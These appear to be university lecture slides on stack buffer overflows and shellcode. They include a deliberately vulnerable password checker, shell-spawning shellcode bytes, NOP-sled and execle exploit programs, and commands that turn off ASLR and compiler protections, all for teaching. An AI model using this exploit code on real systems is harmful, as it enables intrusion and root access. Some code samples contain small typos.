Shellcode Georgia Tech ECE6612 Computer Network Security Reference: "Hacking: the Art of Exploitation," Jon Erickson, 2nd ed., ISBN-13: 978-1-59327-144-2 Reviewed by John Copeland 3/30/14 A computer is exploited ("hacked") if an unauthorized person gains access to the computer's data and computing resources. This can be done by: 1. discovering a valid username and password (e.g., guessing or social engineering), 2. injecting crafted data into a vulnerable program to make it do things it should not do (e.g., SQL injection to extract private data, or cause a "buffer overflow" to alter data), 3. injecting "shell code" into the computer memory, and then getting the computer to execute that code. These slides will demo and discuss the second and third techniques: 1. What is "shellcode". 2. How can it be injected. 3. How can it be run. 2 These slides will build up a foundation for further study using the book "Hacking, the Art of Exploitation," ed.2, by Jon Erickson*. Once techniques are known, defenses are incorporated. The hacker community then develops new techniques, and the cycle repeats. The book discusses the technological basis for past exploits, and details several cycles of hackers versus operating system developers. Neither the book nor these slides show specific techniques that can be used against current, updated operating systems. It does show how to construct a program for testing another program's susceptibility for buffer overflows, illustrating how hackers continually find new vulnerabilities. "Honey Pots" are computers set up to attract attacks so that the newest exploit code can be studied. The best code today uses sophisticated encryption and obfuscation techniques to prevent disassembly. Observing the network activity of an infected computer often does provide valuable information, especially if the covert channel techniques being used can be discovered. *www.nostarchpress.com 3 Vulnerabilities Fixed in two versions on SeaMonkey Browser (Firefox with Editing) Fixed in SeaMonkey 2.0.12 MFSA 2011-10 CSRF risk with plugins and 307 redirects MFSA 2011-08 ParanoidFragmentSink allows javascript: URLs in chrome docs MFSA 2011-07 Memory corruption during text run construction (Windows) MFSA 2011-06 Use-after-free error using Web Workers MFSA 2011-05 Buffer overflow in JavaScript atom map MFSA 2011-04 Buffer overflow in JavaScript upvarMap MFSA 2011-03 Use-after-free error in JSON.stringify MFSA 2011-02 Recursive eval call causes confirm dialogs to evaluate to true MFSA 2011-01 Miscellaneous memory safety hazards (rv:1.9.2.14/ 1.9.1.17) Fixed in SeaMonkey 2.0.11 MFSA 2010-84 XSS hazard in multiple character encodings MFSA 2010-83 Location bar SSL spoofing using network error page MFSA 2010-82 Incomplete fix for CVE-2010-0179 [see http://cve.mitre.org/cve/] MFSA 2010-81 Integer overflow vulnerability in NewIdArray MFSA 2010-80 Use-after-free error with nsDOMAttribute MutationObserver MFSA 2010-79 Java security bypass from LiveConnect loaded via data: URL refresh MFSA 2010-78 Add support for OTS font sanitizer MFSA 2010-77 Crash and remote code execution using HTML tags inside a XUL tree MFSA 2010-76 Chrome privilege escalation with window.open and <isindex> element MFSA 2010-75 Buffer overflow while line breaking after document.write with long string MFSA 2010-74 Miscellaneous memory safety hazards (rv:1.9.2.13/ 1.9.1.16) 4 The C Programming Language by Brian W. Kerningham and Dennis M. Ritchie* Developed along with UNIX in 1975 at Bell Labs, Murray Hill, NJ #include <time.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> #include <sys/stat.h> char progid[80] = "square_it.c by John Copeland 4/1/2011" ; int do_square( int x) // "x" here is a local variable, stored in a different { // location (on the stack) from the "x" in main x=x*x; return( x ) ; } int main(int argc, char * argv[ ]) { int x, y ; // modern: replace "int" with "int32_t" char buf[100] ; printf("\n%s\n", progid ) ; while(1) { printf("\n Type number (q = quit) : ") ; gets( buf ) ; if( buf[0] == 'q' ) break ; x = atoi( buf ) ; y = do_square( x ) ; printf(" The square of %d is %d\n", x, y ); } return( 0 ) ; } $ gcc -W all -o square_it square_it.c $ copeland$ ./square_it square_it.c by John Copeland 4/1/2011 warning: this program uses gets(), which is unsafe. Type number (q = quit) : 2 The square of 2 is 4 Type number (q = quit) : 3 The square of 3 is 9 Type number (q = quit) : q $ *Prentice Hall; ed 2 (1988), ISBN-10: 0131103628,ISBN-13: 978-0131103627, $48 Handy reference: http://www.acm.uiuc.edu/webmonkeys/book/c_guide/ (dated 1997 ) 5 Integer and Character Declarations Old-Style Length in Bits CPU Type Variable Type DEC PDP-11 Honeywell 6000 IBM 370 Interdata 8/32 32-bit Intel PC, IA32 char 8 9 8 8 8 short int 16 36 16 16 16 int 16 36 32 32 32 long int 32 36 32 32 32 long long int 32 36 32 32 64 float (double/2) 64 36 32 64 32 // modern style: "int x ;" can be replaced by "int32_t x ;" #include <stdint.h> int32_t x ; uint8_t c ; 6 C without memory pointers, is no C at all int64_t X, *P, A[10] ; char S[100] ; // int64_t replaces "long long" // string up to 99 chars, S[99] must = 0 (null) Kept in Symbol Table Name In Executable Program Type of Variable Memory Allocated (bytes) X 8-byte integer 200-207, is the value of X P 4-byte pointer to 8-byte integer 210-213, for memory-address A 4-byte pointer to 8-byte integer 20-99, for 10 8-byte integers S 4-byte pointer to 1-byte character 100-199 for 100 1-byte characters (integers) Equivalents: X and *( &X ) -also- S[10] and *(S+10) after P = &X : X and *P and P[0] and *(P + 0 ) "&" means "address of _", * means "value pointed to by _" 7 How Programs are Stored in Memory, and subroutine arguments are put on stack. Lowest Address Process Memory Text or Code Segment Data Segment BSS Segment (data) Heap Segment Created by a subroutine or function call ---> (grows toward higher addresses) Stack Segment Highest Address (grows toward lower addresses) Stack Frame Return-Value Pointer Local Variables (e.g.): char buffer[10] int flag Saved Frame Pointer Return Instruction Ptr † Subroutine Input Arguments (passed by value) † Modify this address to point at shell code, then return (set program counter) to this address when done. Erickson pp. 69-75 8 Subroutine Calls Program Counter PC or EIP 10000 -> 10008 -> Text (Code) Segment main( ) y = do_square( x ) printf( … ) Stack Data or BSS Segment Buffer, flags Return Value Ptr Augment x: 2 -> 4 x: 2 y: _ -> 4 Saved Frame Pointer PC return: 10008 square_it( ) 40000 -> x=x*x 40008 -> return( x ) Input Augment 2 Stack Frame A subroutine call adds memory locations to the top of the stack, to hold all the local variables and the return value for the Program Counter (and Stack Pointer). 9 Strings in C A string is an array of characters, terminated by a null byte ('\0'). C does not store the length, or maximum length, of a string. Frequent coding error: forgetting that S below can only hold 9 characters. char S[10], c='a', T[ ]="predefined", A[3][ ]={"yes","no","?"},*P; Memory: 0000000000apredefined0yes0no00?000PPPP //each char is a byte Program Line: printf("Results: %c.%s.\n", c, T ) ; Results: a.predefined. Program Line: gets( S ) ; //input from keyboard, note S is a char ptr User types: "c.abcdefghijI GOT YOU !" // > 10 characters Memory: abcdefghijI GOT YOU ! yes0no00?000PPPP //each char is a byte Program Line: printf("Results: %c.%s.\n", c,T ) ; Results: I. GOT YOU ! . Cure: fgets( S, 9, stdin) ; // limits input string to 9 characters We can see that a buffer overflow will mess up data, but how do we 1) put executable code in a string, and 2) execute it? Erickson pp. 5-114 10 Stack Buffer-Overflow // authenticate_me.c should grant access to only "john" or "cope" #include <stdio.h> #include <string.h> #include <stdlib.h> int check_auth( char *password) { char pw_buffer[16] ; int auth_flag = 0 ; strcpy(pw_buffer, password ) // string copy if(strcmp( password_buffer, "john" ) == 0 ) // string compare auth_flag = 1 ; if(strcmp( pw_buffer, "cope" ) == 0 ) // string compare auth_flag = 1 ; return( auth_flag ) ; } int main( int argc, char * argv[ ]) { if( check_auth( argv[ 1 ] ) // if return-augument != 0 printf(" ### Access Granted ### ") ; // for "john" or "cope" else printf(" ### Access Denied ### ") ; // anything else return( 0 ) ; } Erickson p. 122 11 Testing "Authenticate_Me" $ ./authenticate_me john ### Access Granted ### $ ./authenticate_me cope ### Access Granted ### $ ./authenticate_me nobody ### Access Denied ### $ ./authenticate_me xxxxxxxxxxxxxxxx Overwriting "auth_flag" ### Access Granted ### $ ./authenticate_me xxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Overwriting PC return value in the preceding stack frame. Segmentation fault $ Hackers use programs that automatically try all lengths of input to find a length that does what they want. 12 Fuzzers A "Fuzzer" is a program that generates quasi-random data input to a program to test for unanticipated problems. For example, putting increasing long command line arguments in "Authenticate-Me" would show a range that produced segmentation faults, the a range that worked to get authenticated. Black-box Fuzzer – produces random input data. White-box Fuzzer – uses algorithms to increase the codecoverage for testing known code. 13 Shellcode "Shellcode" is binary code that will execute without being processed by a "Loader". 1. Must make kernel system calls directly (no standard lib.s) 2. Must use absolute or relative jumps (no relocatable jumps) 3. Must be written using assembly language, and with a limited set of commands (e.g., no labels). Development can be helped by looking at assembly code generated by the C compiler, using the gdb debugger. The original shell code (shown later) starts a shell (e.g., /bin/sh) running so that a command prompt is available. If the vulnerable program is a SUID program (e.g., passwd), then the shell user is "root." Now "shell code" has come to include any similar code with other functions (e.g., installing a back door). Erickson pp. 281-318 14 Hooking Code Program Counter (PC or EIP) 10000 -> 10008 -> Text (Code) Segment Stack SP -> main( ) y = do_square( x ) printf( … ) buffer (unused) Return Value: 4 Augment x: 2 -> 4 Saved Frame Pointer do_square( ) 40000 -> x=x*x 40008 -> return( x ) Input Augment 2 Previous Stack Frame 80000 -> starting instruction more instructions jump 10008 Sled of NOP's PC return: 80000 Later PC Return Shellcode Data Overflow to Inject New "PC Return" Shellcode Repeated Address (hopefully -> sled) Exploit code that installs shellcode must: Get the PC return value from the Stack for the final "jump" state (or let it crash later). Know where the shellcode has been written in memory, to reset the PC return. The shellcode can reset the stack based on the current SP and SFP values. 15 Putting Binary Shellcode into a String, on Command Line // type_shellcode.c // compile: gcc type_shellcode.c -o type_shellcode // output to stdout a (4 x argv[1])-byte sled, shell code, and then argv[2] // start addresses argv[3-6]: ./type_shellcode 10 20 191 255 248 92 // 40-byte sled, shellcode, 20 times 0xbffff85c * #include <stdio.h> ;#include <stdlib.h> ;#include <string.h> ; #include <sys/stat.h> char shellcode[ ] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80" "\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80"; // 36 bytes + ‘\x00’ int main(int argc, char * argv[ ]) { int i , n ; char c[4] ; Build sled - 10 nop's n = 4 * atoi( argv[ 1 ] ) ; // n = 10 for(i = 0; i < n ; i++) printf("%c",'\x90');// build sled of NOPs printf("%s", shellcode ) ; c[0]=atoi(argv[3]); c[1]=atoi(argv[4]); // 191 255 = hex bf ff c[2]=atoi(argv[5]); c[3]=atoi(argv[6]); // 248 92 = hex f8 5c n = atoi( argv[ 2 ] ) ; // n = 20 Print shellcode for(i = 0; i < n ; i++) printf("%c%c%c%c", c[0],c[1],c[2],c[3]); // start addresses return( 0 ) ; Build block - 20 ret's } Usage: > ./authenticate_me $(./type_shellcode 10 20 191 255 248 92 ) // To run, you must use gdb to find the right value of the starting address. // bash shell expands $( ./x ) to output of program ./x // *This is for a G4 CPU. For an Intel CPU, reverse the order of address-byte integers. 16 To see where pw_buffer is stored, add a line: printf(" ======= &pw_buffer = %x = %u\n", (unsigned int) &pw_buffer, (unsigned int) &pw_buffer ) ; and comment out other printf() lines: $./authenticate_me john ======= &pw_buffer = bfe27540 = 3,219,289,408 $./authenticate_me john ======= &pw_buffer = bfecb010 = 3,219,959,824 $./authenticate_me john ======= &pw_buffer = bfe35480 = 3,219,346560 $./authenticate_me john ======= &pw_buffer = bfe7b720 = 3,219,633952 $./authenticate_me john ======= &pw_buffer = bff71840 = 3,220,641,856 $./authenticate_me john ======= &pw_buffer = bff96ad0 = 3,220,794,064 $./authenticate_me john ======= &pw_buffer = bffeaab0 = 3,221,138,096 Address space layout randomization (ALSR) Stack Overflow Injection is now difficult because the address of the stack frame varies over a range of 2,000,000 bytes, each time the modified program was run. It only needs to work once. By automatically trying up to a million times, a single hit is probable, and that can install a back door to root. (see p. 384-391) 17 Run a program with execle() to limit the Environment. Put the shellcode into the only Environment string, env[0]. The overflow string (buffer) only has to have the starting address (ret), repeated many times.* // execle_run.c #include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <stdint.h> int main(int argc, char *argv[ ]) { char *env[2][ ] = {"\x31\xc0\x31 … \xcd\x80", NULL}; //Must be NULL uint_32 i, ret = 0xbffffffa;//address of env[0] in "authenticate_me" char buffer[161] ; for(i=0;i<160;i+=4) *( (uint32_t*) (buffer+i) ) = ret ; // put in 4-byte address buffer[160] = 0 ; execle("./authenticate_me", "authenticate_me", buffer, NULL, env ); return( 0 ) ; } * Erickson pp. 149-150 ** With today's (2011) Linux, "ret" has to match a different value on each run, even when execle() is used. 18 Buffer overflows can be used to: Alter data later used in control statements. Input data and control data on stack. Inject shellcode and cause it to be executed. Basic problem: Input data and Program-Counter return values are kept on the stack. PC can point to a stack address. Other types of overflows: Stack segment overflow (p. 150) Function pointer overflow (p. 156) Printf format strings(p.171) Examine stack values Read arbitrary values from memory Write arbitrary values to memory 19 Present day c compilers (gcc) and Linux are designed to defeat most of the techniques discussed in "Hacking, the Art of Exploitation". For those of you who would like to experiment with code that has vulnerabilities, you can turn some of these protections off in the OS, and in the gcc compiler: *** to disable ASLR (Address Space Layout Randomization) : This change is immediate on the running OS kernel (run with root privileges). sudo echo 0 > /proc/sys/kernel/randomize_va_space (when done: echo 1 > /proc/sys/kernel/randomize_va_space) *** To turn off gcc protections when you compile your program, use options -fno-stack-protector this will disable canaries -fno-stack-protector-all -fno-address-sanitizer Turn off AddressSanitizer, a memory error detector. -fno-memsafety -z execstack this will disable executable stack protection -fnomudflap this will disable protections for risky pointer operations that may be used in overflows - to not catch runtime memory access errors. Example gcc compile: > gcc –g -fno-stack-protector -z execstack –Wall –o program program.c -Wall shows all warnings, always good to have, -g so you can use gdb to show c code lines, and variable locations. Information provided by Dr. Selcuk Uluagac, GT ECE (now at Fla. International U.) 20 Networking, Chapter 4 Concise explanation of of sockets, protocol stack, formats, … Simple code for: Server program (p.204) Web Server program (p.213) Network traffic sniffing (p.224) Source code for Nemesis (arp spoofing, p.245) SYN flood, Ping of Death, Ping Flood, … TCP/IP highjacking (p.258) Port scanning (p.264) Pro-active defense (p.267) Port-binding shellcode (p.278) 21 Shellcode, Chapter 5 Using ASM to write assembly code (p.281) Linux system calls (p.283) Investigating with gdb (p.289) Removing null bytes (p.290) Shell-spawning shellcode (the original, p.295) Port-binding shellcode (for backdoors, p.303) Connect-back shellcode (defeat firewalls, p.314) 22 Counter Measures, Chapter 6 Counter measures that detect intrusion (p.320) Log files (p.334) Rootkit techniques (p.348) Socket reuse (p.355) Payload smuggling (hiding signatures, p.359) Polymorphic Printable ASCII shellcode (p.366) Non-executable stack (available, not used, p.376) Randomized stack space (seen earlier, p.379) Defeating above (p.388) 23 Cryptology, Chapter 7 Basics (p.393) Symmetric encryption (p.398) Asymmetric encryption (p.400) Hybrid Ciphers (man-in-the-middle attacks, p.406) SSH attacks Password Cracking (p.418) Dictionary attacks, Rainbow Tables Wireless 802.11b WiFi encryption (p.436) WPA attacks - not covered Conclusion, Chapter 8 (pp. 452-453) 24